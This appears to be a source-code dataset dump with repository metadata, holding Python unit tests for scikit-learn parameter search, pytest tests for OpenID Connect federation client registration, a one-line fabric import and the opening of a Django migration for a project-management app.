| 37.538843 | 135 | 0.623927 | 2,783 | 22,711 | 4.974488 | 0.070787 | 0.02167 | 0.035683 | 0.043918 | 0.83408 | 0.823606 | 0.812337 | 0.799335 | 0.777521 | 0.770153 | 0 | 0.000626 | 0.296552 | 22,711 | 604 | 136 | 37.600993 | 0.865924 | 0.376029 | 0 | 0.692308 | 0 | 0 | 0.067451 | 0.001817 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0.003205 | 0.016026 | 0 | 0.320513 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dbbf08749f4778347fdd5ca74691fca498cef1f0 | 6,492 | py | Python | AppVoor/tests/parameter_search_test.py | Noczio/VoorSpelling | 51e30ab3f3b2e346c6eb56578818020e142a3adb | [
"BSD-3-Clause"
] | 3 | 2020-10-09T06:15:14.000Z | 2021-04-27T02:04:28.000Z | AppVoor/tests/parameter_search_test.py | Noczio/VoorSpelling | 51e30ab3f3b2e346c6eb56578818020e142a3adb | [
"BSD-3-Clause"
] | 17 | 2020-09-10T20:22:01.000Z | 2020-12-21T04:57:03.000Z | AppVoor/tests/parameter_search_test.py | Noczio/VoorSpelling | 51e30ab3f3b2e346c6eb56578818020e142a3adb | [
"BSD-3-Clause"
] | null | null | null | import unittest
from resources.backend_scripts.estimator_creation import EstimatorCreator
from resources.backend_scripts.load_data import LoaderCreator
from resources.backend_scripts.parameter_search import BayesianSearchParametersPossibilities
from resources.backend_scripts.parameter_search import GridSearchParametersPossibilities
from resources.backend_scripts.parameter_search import ParameterSearchCreator
from resources.backend_scripts.split_data import SplitterReturner
class MyTestCase(unittest.TestCase):
_loader_creator = LoaderCreator()
_param_search_creator = ParameterSearchCreator()
_estimator_creator = EstimatorCreator()
def test_molecules_SVC_bayesian_search(self):
# path to molecules.csv file in project
path = ".\\..\\datasets\\molecules.csv"
# get df with loader creator
csv_type = self._loader_creator.create_loader(path, "TSV")
df = csv_type.get_file_transformed()
df = df.drop(["m_name"], axis=1)
# split df into x and y
x, y = SplitterReturner.split_x_y_from_df(df)
# create a simple SVC estimator
model = self._estimator_creator.create_estimator("SVC")
# create a prm variable that stores the param grid to search
prm = BayesianSearchParametersPossibilities.case("SVC")
# create a ps variable that stores a bayesian search object
ps = self._param_search_creator.create_parameter_selector("BS")
# get best params from ps.search_parameters
best_prm, score = ps.search_parameters(x, y, prm, 10, model, "accuracy")
print(best_prm)
print(score)
def test_wine_quality_LASSO_BS(self):
# path to diabetes.csv file in project
path = ".\\..\\datasets\\winequality-red.csv"
# get df with loader creator
scsv_type = self._loader_creator.create_loader(path, "SCSV")
df = scsv_type.get_file_transformed()
# create a prm variable to store params grid
initial_prm = BayesianSearchParametersPossibilities.case("Lasso")
# create an estimator using EstimatorCreator
estimator = self._estimator_creator.create_estimator("Lasso")
# split df into x and y
splitter = SplitterReturner()
x, y = splitter.split_x_y_from_df(df)
# create a ps variable that stores a grid search object
ps = self._param_search_creator.create_parameter_selector("BS")
# get best params from ps.search_parameters
best_prm, score = ps.search_parameters(x, y, initial_prm, 10, estimator, "r2")
print(best_prm)
print(score)
def test_diabetes_lsvc_search_bs(self):
# path to diabetes.csv file in project
path = ".\\..\\datasets\\diabetes.csv"
# get df with loader creator
csv_type = self._loader_creator.create_loader(path, "CSV")
df = csv_type.get_file_transformed()
# split df into x and y
x, y = SplitterReturner.split_x_y_from_df(df)
# create a simple linearSVC estimator
model = self._estimator_creator.create_estimator("LinearSVC")
# create a prm variable that stores the param grid to search
prm = BayesianSearchParametersPossibilities.case("LinearSVC")
# create a ps variable that stores a bayesian search object
ps = self._param_search_creator.create_parameter_selector("BS")
# get best params from ps.search_parameters
best_prm, _ = ps.search_parameters(x, y, prm, 10, model, "accuracy")
print(best_prm)
def test_wine_quality_LASSO_GS(self):
# path to diabetes.csv file in project
path = ".\\..\\datasets\\winequality-white.csv"
# get df with loader creator
scsv_type = self._loader_creator.create_loader(path, "SCSV")
df = scsv_type.get_file_transformed()
# create a prm variable to store params grid
initial_prm = GridSearchParametersPossibilities.case("Lasso")
# create an estimator using EstimatorCreator
estimator = self._estimator_creator.create_estimator("Lasso")
# split df into x and y
splitter = SplitterReturner()
x, y = splitter.split_x_y_from_df(df)
# create a ps variable that stores a grid search object
ps = self._param_search_creator.create_parameter_selector("GS")
# get best params from ps.search_parameters
best_prm, _ = ps.search_parameters(x, y, initial_prm, 10, estimator, "r2")
print(best_prm)
def test_molecules_SVC_grid_search(self):
# path to molecules.csv file in project
path = ".\\..\\datasets\\molecules.csv"
# get df with loader creator
csv_type = self._loader_creator.create_loader(path, "TSV")
df = csv_type.get_file_transformed()
df = df.drop(["m_name"], axis=1)
# split df into x and y
splitter = SplitterReturner()
x, y = splitter.split_x_y_from_df(df)
# create a simple SVC estimator
model = self._estimator_creator.create_estimator("SVC")
# create a prm variable that stores the param grid to search
prm = GridSearchParametersPossibilities.case("SVC")
# create a ps variable that stores a grid search object
ps = self._param_search_creator.create_parameter_selector("GS")
# get best params from ps.search_parameters
best_prm, score = ps.search_parameters(x, y, prm, 10, model, "accuracy")
print(best_prm, score)
def test_diabetes_LSVC_grid_search(self):
# path to diabetes.csv file in project
path = ".\\..\\datasets\\diabetes.csv"
# get df with loader creator
csv_type = self._loader_creator.create_loader(path, "CSV")
df = csv_type.get_file_transformed()
# split df into x and y
splitter = SplitterReturner()
x, y = splitter.split_x_y_from_df(df)
# create a simple linearSVC estimator
model = self._estimator_creator.create_estimator("LinearSVC")
# create a prm variable that stores the param grid to search
prm = GridSearchParametersPossibilities.case("LinearSVC")
# create a ps variable that stores a grid search object
ps = self._param_search_creator.create_parameter_selector("GS")
# get best params from ps.search_parameters
best_prm, score = ps.search_parameters(x, y, prm, 10, model, "accuracy")
print(best_prm)
print(score)
if __name__ == '__main__':
unittest.main()
| 47.735294 | 92 | 0.688694 | 822 | 6,492 | 5.199513 | 0.114355 | 0.05475 | 0.050538 | 0.037904 | 0.868975 | 0.846514 | 0.846514 | 0.807206 | 0.807206 | 0.801591 | 0 | 0.003199 | 0.229667 | 6,492 | 135 | 93 | 48.088889 | 0.85143 | 0.252773 | 0 | 0.621951 | 0 | 0 | 0.072379 | 0.039933 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0.085366 | 0 | 0.207317 | 0.109756 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dbcfe1fa154406a3044c8b75fafe3edb788d380e | 24,957 | py | Python | tests/test_12_registration.py | peppelinux/fedservice | 0dc5fd0bd33e181b6a1a9bbef6835b2ce5d2f568 | [
"Apache-2.0"
] | 1 | 2020-09-30T13:07:41.000Z | 2020-09-30T13:07:41.000Z | tests/test_12_registration.py | peppelinux/fedservice | 0dc5fd0bd33e181b6a1a9bbef6835b2ce5d2f568 | [
"Apache-2.0"
] | null | null | null | tests/test_12_registration.py | peppelinux/fedservice | 0dc5fd0bd33e181b6a1a9bbef6835b2ce5d2f568 | [
"Apache-2.0"
] | null | null | null | import os
from oidcop.cookie_handler import CookieHandler
from oidcop.server import Server
from oidcop.user_authn.authn_context import UNSPECIFIED
from oidcop.user_authn.user import NoAuthn
from oidcrp.entity import Entity
from oidcrp.exception import OtherError
import pytest
import responses
from fedservice import FederationEntity
from fedservice.entity_statement.statement import TrustChain
from fedservice.metadata_api.fs2 import read_info
from fedservice.op import authorization
from fedservice.op import provider_config
from fedservice.op import registration
from fedservice.rp.authorization import FedAuthorization
from fedservice.rp.provider_info_discovery import FedProviderInfoDiscovery
from fedservice.rp.registration import Registration
from .utils import DummyCollector
from .utils import Publisher
BASE_PATH = os.path.abspath(os.path.dirname(__file__))
ROOT_DIR = os.path.join(BASE_PATH, 'base_data')
KEYSPEC = [
{"type": "RSA", "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]},
]
COOKIE_KEYDEFS = [
{"type": "oct", "kid": "sig", "use": ["sig"]},
{"type": "oct", "kid": "enc", "use": ["enc"]}
]
ENTITY_ID = 'https://foodle.uninett.no'
ANCHOR = {'https://feide.no': read_info(os.path.join(ROOT_DIR, 'feide.no'), "feide.no", "jwks")}
class TestExplicit(object):
@pytest.fixture(autouse=True)
def create_endpoint(self):
# First the RP
entity = Entity(config={
'behaviour': {
'federation_types_supported': ['explicit']
},
'issuer': "https://op.ntnu.no",
'keys': {'key_defs': KEYSPEC}
})
service_context = entity.client_get("service_context")
# the federation part of the RP
self.rp_federation_entity = FederationEntity(
entity_id=ENTITY_ID, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party', opponent_entity_type='openid_provider'
)
self.rp_federation_entity.collector = DummyCollector(
trusted_roots=ANCHOR, root_dir=ROOT_DIR)
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'foodle.uninett.no'), 'foodle.uninett.no', 'jwks'),
issuer_id=ENTITY_ID)
# add the federation part to the service context
service_context.federation_entity = self.rp_federation_entity
# The RP has/supports 3 services
self.service = {
'discovery': FedProviderInfoDiscovery(entity.client_get),
'registration': Registration(entity.client_get),
'authorization': FedAuthorization(entity.client_get),
}
# and now for the OP
op_entity_id = "https://op.ntnu.no"
conf = {
"issuer": op_entity_id,
"password": "mycket hemligt",
"token_expires_in": 600,
"grant_expires_in": 300,
"refresh_token_expires_in": 86400,
"httpc_param": {'verify': False, "timeout": 2},
"claims_interface": {"class": "oidcop.session.claims.ClaimsInterface", "kwargs": {}},
"cookie_handler": {
"class": CookieHandler,
"kwargs": {
"keys": {"key_defs": COOKIE_KEYDEFS},
"name": {
"session": "oidc_op",
"register": "oidc_op_reg",
"session_management": "oidc_op_sman"
}
},
},
"endpoint": {
'provider_info': {
'path': '.well-known/openid-federation',
'class': provider_config.ProviderConfiguration,
'kwargs': {'client_authn_method': None}
},
'registration': {
'path': 'fed_registration',
'class': registration.Registration,
'kwargs': {'client_authn_method': None}
},
'authorization': {
'path': 'authorization',
'class': authorization.Authorization,
'kwargs': {
"response_modes_supported": ['query', 'fragment', 'form_post'],
"claims_parameter_supported": True,
"request_parameter_supported": True,
"request_uri_parameter_supported": True,
"client_authn_method": ['request_param']
}
}
},
"keys": {
"private_path": "own/jwks.json",
"uri_path": "static/jwks.json",
"key_defs": KEYSPEC
},
"authentication": {
"anon": {
'acr': UNSPECIFIED,
"class": NoAuthn,
"kwargs": {"user": "diana"}
}
},
'template_dir': 'template'
}
server = Server(conf)
self.registration_endpoint = server.server_get("endpoint", "registration")
self.authorization_endpoint = server.server_get("endpoint", "authorization")
self.provider_endpoint = server.server_get("endpoint", "provider_config")
# === Federation stuff =======
federation_entity = FederationEntity(
op_entity_id, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party',
httpd=Publisher(ROOT_DIR),
opponent_entity_type='openid_relying_party')
federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=op_entity_id)
federation_entity.collector = DummyCollector(
httpd=Publisher(ROOT_DIR),
trusted_roots=ANCHOR,
root_dir=ROOT_DIR)
self.registration_endpoint.server_get(
"endpoint_context").federation_entity = federation_entity
def test_explicit_registration(self):
_registration_service = self.service['registration']
# Using the RP's federation entity instance
_fe = _registration_service.client_get("service_context").federation_entity
_endpoint_context = self.registration_endpoint.server_get("endpoint_context")
# This is cheating. Getting the OP provider info
trust_chain = TrustChain()
trust_chain.metadata = _endpoint_context.provider_info
trust_chain.anchor = "https://feide.no"
trust_chain.verified_chain = [{'iss': "https://ntnu.no"}]
self.service['discovery'].update_service_context([trust_chain])
# add the OP's federation keys
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=_endpoint_context.provider_info['issuer'])
# construct the client registration request
req_args = {
'entity_id': self.rp_federation_entity.entity_id,
'redirect_uris': ['https://foodle.uninett.no/cb']
}
self.rp_federation_entity.proposed_authority_hints = ['https://ntnu.no']
jws = _registration_service.construct(request_args=req_args)
assert jws
# THe OP handles the registration request
res = self.registration_endpoint.process_request(jws)
assert res
reg_resp = self.registration_endpoint.do_response(**res)
assert set(reg_resp.keys()) == {'response', 'http_headers', 'cookie'}
# The RP parses the OP's response
args = _registration_service.parse_response(reg_resp['response'], request=jws)
assert set(args.keys()) == {'entity_id', 'client_id', 'contacts', 'application_type',
'redirect_uris', 'response_types', 'client_id_issued_at',
'client_secret', 'grant_types', 'client_secret_expires_at'}
class TestAutomatic(object):
@pytest.fixture(autouse=True)
def create_endpoint(self):
# First the RP
entity = Entity(config={
'behaviour': {
'federation_types_supported': ['explicit']
},
'issuer': "https://op.ntnu.no",
'keys': {'key_defs': KEYSPEC},
"httpc_param": {'verify': False, "timeout": 2},
})
# the federation part of the RP
self.rp_federation_entity = FederationEntity(
entity_id=ENTITY_ID, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party', opponent_entity_type='openid_provider'
)
self.rp_federation_entity.collector = DummyCollector(
trusted_roots=ANCHOR, root_dir=ROOT_DIR)
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'foodle.uninett.no'), 'foodle.uninett.no', 'jwks'),
issuer_id=ENTITY_ID)
# add the federation part to the service context
entity.client_get("service_context").federation_entity = self.rp_federation_entity
# The RP has/supports 3 services
self.service = {
'discovery': FedProviderInfoDiscovery(entity.client_get),
'registration': Registration(entity.client_get),
'authorization': FedAuthorization(entity.client_get,
conf={"request_object_expires_in": 300}),
}
# and now for the OP
op_entity_id = "https://op.ntnu.no"
conf = {
"issuer": op_entity_id,
"httpc_param": {'verify': False, "timeout": 2},
"password": "mycket hemligt",
"token_expires_in": 600,
"grant_expires_in": 300,
"refresh_token_expires_in": 86400,
"verify_ssl": False,
"cookie_handler": {
"class": CookieHandler,
"kwargs": {
"keys": {"key_defs": COOKIE_KEYDEFS},
"name": {
"session": "oidc_op",
"register": "oidc_op_reg",
"session_management": "oidc_op_sman"
}
},
},
"endpoint": {
'provider_info': {
'path': '.well-known/openid-federation',
'class': provider_config.ProviderConfiguration,
'kwargs': {'client_authn_method': None}
},
'registration': {
'path': 'fed_registration',
'class': registration.Registration,
'kwargs': {'client_authn_method': None}
},
'authorization': {
'path': 'authorization',
'class': authorization.Authorization,
'kwargs': {
"response_modes_supported": ['query', 'fragment', 'form_post'],
"claims_parameter_supported": True,
"request_parameter_supported": True,
"request_uri_parameter_supported": True,
"client_authn_method": ['request_param']
}
}
},
"keys": {
"private_path": "own/jwks.json",
"uri_path": "static/jwks.json",
"key_defs": KEYSPEC
},
"authentication": {
"anon": {
'acr': UNSPECIFIED,
"class": NoAuthn,
"kwargs": {"user": "diana"}
}
},
'template_dir': 'template',
"claims_interface": {"class": "oidcop.session.claims.ClaimsInterface", "kwargs": {}},
'add_on': {
"automatic_registration": {
"function":
"fedservice.op.add_on.automatic_registration.add_support",
"kwargs": {
"new_id": False, # default False
'client_registration_authn_methods_supported': {"ar": ['request_object']},
'where': ['authorization']
}
}
}
}
server = Server(conf)
self.registration_endpoint = server.server_get("endpoint", "registration")
self.authorization_endpoint = server.server_get("endpoint", "authorization")
self.provider_endpoint = server.server_get("endpoint", "provider_config")
# === Federation stuff =======
federation_entity = FederationEntity(
op_entity_id, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party',
httpd=Publisher(ROOT_DIR),
opponent_entity_type='openid_relying_party')
federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=op_entity_id)
federation_entity.collector = DummyCollector(
httpd=Publisher(ROOT_DIR),
trusted_roots=ANCHOR,
root_dir=ROOT_DIR)
self.registration_endpoint.server_get(
"endpoint_context").federation_entity = federation_entity
def test_automatic_registration_new_client_id(self):
_registration_service = self.service['registration']
self.authorization_endpoint.server_get("endpoint_context").provider_info[
'client_registration_authn_methods_supported'] = {"ar": ['request_object']}
self.authorization_endpoint.automatic_registration_endpoint.kwargs['new_id'] = True
# This is cheating. Getting the OP's provider info
_fe = _registration_service.client_get("service_context").federation_entity
statement = TrustChain()
statement.metadata = self.registration_endpoint.server_get("endpoint_context").provider_info
statement.anchor = "https://feide.no"
statement.verified_chain = [{'iss': "https://ntnu.no"}]
with responses.RequestsMock() as rsps:
_jwks = self.authorization_endpoint.server_get("endpoint_context").keyjar.export_jwks()
rsps.add("GET", 'https://op.ntnu.no/static/jwks.json', body=_jwks,
adding_headers={"Content-Type": "application/json"}, status=200)
self.service['discovery'].update_service_context([statement])
# and the OP's federation keys
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=self.registration_endpoint.server_get("endpoint_context").provider_info[
'issuer'])
_context = self.service['authorization'].client_get("service_context")
_context.issuer = 'https://op.ntnu.no'
_context.redirect_uris = ['https://foodle.uninett.no/callback']
_context.entity_id = self.rp_federation_entity.entity_id
_context.client_id = self.rp_federation_entity.entity_id
_context.behaviour = {'response_types': ['code']}
_context.provider_info = self.authorization_endpoint.server_get(
"endpoint_context").provider_info
authn_request = self.service['authorization'].construct()
# Have to provide the OP with clients keys
self.authorization_endpoint.server_get("endpoint_context").keyjar.import_jwks(
_registration_service.client_get("service_context").keyjar.export_jwks(),
ENTITY_ID
)
# The OP handles the authorization request
req = self.authorization_endpoint.parse_request(authn_request.to_dict())
assert "response_type" in req
client_ids = list(self.authorization_endpoint.server_get("endpoint_context").cdb.keys())
assert len(client_ids) == 2 # dynamic and entity_id
assert ENTITY_ID in client_ids
def test_automatic_registration_keep_client_id(self):
# This is cheating. Getting the OP provider info
_registration_service = self.service['registration']
_fe = _registration_service.client_get("service_context").federation_entity
statement = TrustChain()
statement.metadata = self.registration_endpoint.server_get("endpoint_context").provider_info
statement.anchor = "https://feide.no"
statement.verified_chain = [{'iss': "https://ntnu.no"}]
self.service['discovery'].update_service_context([statement])
# and the OP's federation keys
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=self.registration_endpoint.server_get("endpoint_context").provider_info[
'issuer'])
service_context = self.service['authorization'].client_get("service_context")
service_context.issuer = 'https://op.ntnu.no'
service_context.redirect_uris = ['https://foodle.uninett.no/callback']
service_context.entity_id = self.rp_federation_entity.entity_id
service_context.client_id = self.rp_federation_entity.entity_id
service_context.behaviour = {'response_types': ['code']}
service_context.provider_info = self.authorization_endpoint.server_get(
"endpoint_context").provider_info
authn_request = self.service['authorization'].construct()
# Have to provide the OP with clients keys
self.authorization_endpoint.server_get("endpoint_context").keyjar.import_jwks(
_registration_service.client_get("service_context").keyjar.export_jwks(),
ENTITY_ID
)
_auth_endp_context = self.authorization_endpoint.server_get("endpoint_context")
# get rid of the earlier client registrations
for k in _auth_endp_context.cdb.keys():
del _auth_endp_context.cdb[k]
# Have to provide the OP with clients keys
_auth_endp_context.keyjar.import_jwks(
_registration_service.client_get("service_context").keyjar.export_jwks(),
ENTITY_ID
)
# set new_id to False
self.authorization_endpoint.automatic_registration_endpoint.kwargs["new_id"] = False
# THe OP handles the authorization request
req = self.authorization_endpoint.parse_request(authn_request.to_dict())
assert "response_type" in req
# reg_resp = self.registration_endpoint.do_response(**res)
# assert set(reg_resp.keys()) == {'response', 'http_headers', 'cookie'}
client_ids = list(_auth_endp_context.cdb.keys())
assert len(client_ids) == 1
assert client_ids[0] == ENTITY_ID
class TestAutomaticNoSupport(object):
@pytest.fixture(autouse=True)
def create_endpoint(self):
# First the RP
entity = Entity(config={
'behaviour': {
'federation_types_supported': ['explicit']
},
'issuer': "https://op.ntnu.no",
'keys': {'key_defs': KEYSPEC},
"httpc_param": {'verify': False, "timeout": 2},
})
# the federation part of the RP
self.rp_federation_entity = FederationEntity(
entity_id=ENTITY_ID, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party', opponent_entity_type='openid_provider'
)
self.rp_federation_entity.collector = DummyCollector(
trusted_roots=ANCHOR, root_dir=ROOT_DIR)
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'foodle.uninett.no'), 'foodle.uninett.no', 'jwks'),
issuer_id=ENTITY_ID)
# add the federation part to the service context
entity.client_get("service_context").federation_entity = self.rp_federation_entity
# The RP has/supports 3 services
self.service = {
'discovery': FedProviderInfoDiscovery(entity.client_get),
'registration': Registration(entity.client_get),
'authorization': FedAuthorization(entity.client_get),
}
# and now for the OP
op_entity_id = "https://op.ntnu.no"
conf = {
"issuer": op_entity_id,
"password": "mycket hemligt",
"token_expires_in": 600,
"grant_expires_in": 300,
"refresh_token_expires_in": 86400,
"httpc_param": {'verify': False, "timeout": 2},
"claims_interface": {"class": "oidcop.session.claims.ClaimsInterface", "kwargs": {}},
"endpoint": {
'provider_info': {
'path': '.well-known/openid-federation',
'class': provider_config.ProviderConfiguration,
'kwargs': {'client_authn_method': None}
},
'registration': {
'path': 'fed_registration',
'class': registration.Registration,
'kwargs': {'client_authn_method': None}
},
'authorization': {
'path': 'authorization',
'class': authorization.Authorization,
'kwargs': {
"response_modes_supported": ['query', 'fragment', 'form_post'],
"claims_parameter_supported": True,
"request_parameter_supported": True,
"request_uri_parameter_supported": True,
"client_authn_method": ['request_param']
}
}
},
"keys": {
"private_path": "own/jwks.json",
"uri_path": "static/jwks.json",
"key_defs": KEYSPEC
},
"authentication": {
"anon": {
'acr': UNSPECIFIED,
"class": NoAuthn,
"kwargs": {"user": "diana"}
}
},
'template_dir': 'template'
}
server = Server(conf)
# endpoint_context = EndpointContext(conf)
self.registration_endpoint = server.server_get("endpoint", "registration")
self.authorization_endpoint = server.server_get("endpoint", "authorization")
self.provider_endpoint = server.server_get("endpoint", "provider_config")
# === Federation stuff =======
federation_entity = FederationEntity(
op_entity_id, trusted_roots=ANCHOR,
authority_hints=['https://ntnu.no'],
entity_type='openid_relying_party',
httpd=Publisher(ROOT_DIR),
opponent_entity_type='openid_relying_party')
federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=op_entity_id)
federation_entity.collector = DummyCollector(
httpd=Publisher(ROOT_DIR),
trusted_roots=ANCHOR,
root_dir=ROOT_DIR)
self.registration_endpoint.server_get(
"endpoint_context").federation_entity = federation_entity
def test_automatic_registration_new_client_id(self):
_registration_service = self.service['registration']
# This is cheating. Getting the OP's provider info
_fe = _registration_service.client_get("service_context").federation_entity
statement = TrustChain()
statement.metadata = self.registration_endpoint.server_get("endpoint_context").provider_info
statement.anchor = "https://feide.no"
statement.verified_chain = [{'iss': "https://ntnu.no"}]
self.service['discovery'].update_service_context([statement])
# and the OP's federation keys
self.rp_federation_entity.keyjar.import_jwks(
read_info(os.path.join(ROOT_DIR, 'op.ntnu.no'), 'op.ntnu.no', 'jwks'),
issuer_id=self.registration_endpoint.server_get("endpoint_context").provider_info[
'issuer'])
_context = self.service['authorization'].client_get("service_context")
_context.issuer = 'https://op.ntnu.no'
_context.redirect_uris = ['https://foodle.uninett.no/callback']
_context.entity_id = self.rp_federation_entity.entity_id
# _context.client_id = self.rp_federation_entity.entity_id
_context.behaviour = {'response_types': ['code']}
_context.provider_info = self.authorization_endpoint.server_get(
"endpoint_context").provider_info
# The client not registered and the OP not supporting automatic client registration
with pytest.raises(OtherError):
self.service['authorization'].construct()
| 42.661538 | 100 | 0.595504 | 2,475 | 24,957 | 5.712323 | 0.103838 | 0.05319 | 0.033668 | 0.037346 | 0.831659 | 0.820625 | 0.811218 | 0.79205 | 0.758735 | 0.733131 | 0 | 0.003052 | 0.291061 | 24,957 | 584 | 101 | 42.734589 | 0.796021 | 0.063389 | 0 | 0.680258 | 0 | 0 | 0.220832 | 0.037891 | 0 | 0 | 0 | 0 | 0.021459 | 1 | 0.015021 | false | 0.006438 | 0.070815 | 0 | 0.092275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9154bc0fd2ca64152e68a12d872eb73d55debc66 | 39 | py | Python | tests/vir.py | bretth/woven | ec1da7b401a335f43129e7115fe7a4d145649f1e | [
"BSD-3-Clause"
] | 5 | 2015-05-26T15:02:11.000Z | 2016-10-04T19:39:38.000Z | tests/vir.py | bretth/woven | ec1da7b401a335f43129e7115fe7a4d145649f1e | [
"BSD-3-Clause"
] | 3 | 2015-01-23T01:23:27.000Z | 2019-08-09T12:43:26.000Z | tests/vir.py | bretth/woven | ec1da7b401a335f43129e7115fe7a4d145649f1e | [
"BSD-3-Clause"
] | null | null | null |
from fabric.state import env
| 4.875 | 28 | 0.615385 | 5 | 39 | 4.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.358974 | 39 | 7 | 29 | 5.571429 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
91967e2144f9d6d55110528b39828fb6ae99f71c | 7,174 | py | Python | apps/api/migrations/0001_initial.py | ramseylove/project_management_api | 9c76c4464baf7f9af6c977a42ccd7eb3ce205c7b | [
"MIT"
] | null | null | null | apps/api/migrations/0001_initial.py | ramseylove/project_management_api | 9c76c4464baf7f9af6c977a42ccd7eb3ce205c7b | [
"MIT"
] | null | null | null | apps/api/migrations/0001_initial.py | ramseylove/project_management_api | 9c76c4464baf7f9af6c977a42ccd7eb3ce205c7b | [
"MIT"
] | null | null | null | # Generated by Django 3.1.7 on 2021-08-24 18:23
import apps.api.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import imagekit.models.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Client',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('contact', models.CharField(max_length=200)),
('email', models.EmailField(max_length=254)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Created At')),
('modified_at', models.DateField(auto_now=True, verbose_name='Modified At')),
('comment', models.TextField()),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Issue',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Created At')),
('modified_at', models.DateField(auto_now=True, verbose_name='Modified At')),
('summary', models.CharField(max_length=100)),
('description', models.TextField(verbose_name='Issue Description')),
('status', models.IntegerField(choices=[(1, 'On Hold'), (2, 'To Do'), (3, 'In Progress'), (4, 'In Review'), (5, 'Done')], default=1, verbose_name='Issue Status')),
('priority', models.IntegerField(choices=[(1, 'Low'), (2, 'Medium'), (3, 'High')], default=1, verbose_name='Issue Priority')),
('issueType', models.IntegerField(choices=[(1, 'Task'), (2, 'Bug'), (3, 'Story')], default=1, verbose_name='Issue Type')),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Created At')),
('modified_at', models.DateField(auto_now=True, verbose_name='Modified At')),
('name', models.CharField(max_length=200, unique=True)),
('description', models.TextField()),
('priority', models.IntegerField(choices=[(1, 'Low'), (2, 'Medium'), (3, 'High')], default=1, verbose_name='Project Priority')),
('status', models.IntegerField(choices=[(1, 'Planning'), (2, 'Ready'), (3, 'In Progress'), (4, 'In Review'), (5, 'Finished')], default=1, verbose_name='Project Status')),
('client', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, to='api.client')),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='+', to=settings.AUTH_USER_MODEL)),
